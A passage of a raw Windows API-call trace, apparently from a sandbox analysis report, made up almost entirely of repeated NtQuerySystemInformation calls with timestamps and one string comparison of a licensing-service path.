NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe370, Length=0x28, ResultLength=0x0) [0243.821] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x28, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe180, Length=0x50, ResultLength=0x0) [0243.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe180, Length=0x50, ResultLength=0x0) [0243.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe180, Length=0x50, ResultLength=0x0) [0243.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x50, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x50, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x50, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x50, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x38, ResultLength=0x0) [0243.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddd0, Length=0x28, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddd0, Length=0x28, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddd0, Length=0x28, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddd0, Length=0x28, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde40, Length=0x28, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x38, ResultLength=0x0) [0243.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x28, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x28, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd60, Length=0x20, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdce0, Length=0x20, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdce0, Length=0x20, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdce0, Length=0x20, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x38, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x38, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde20, Length=0x20, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddb0, Length=0x20, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddb0, Length=0x20, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3e0, Length=0x50, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3e0, Length=0x50, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3e0, Length=0x50, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe030, Length=0x28, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe030, Length=0x28, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe030, Length=0x28, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0a0, Length=0x28, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x28, ResultLength=0x0) [0243.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x28, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x20, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0243.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x20, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x20, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x20, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3e0, Length=0x50, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3e0, Length=0x50, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3e0, Length=0x50, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2d0, Length=0x50, ResultLength=0x0) [0243.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 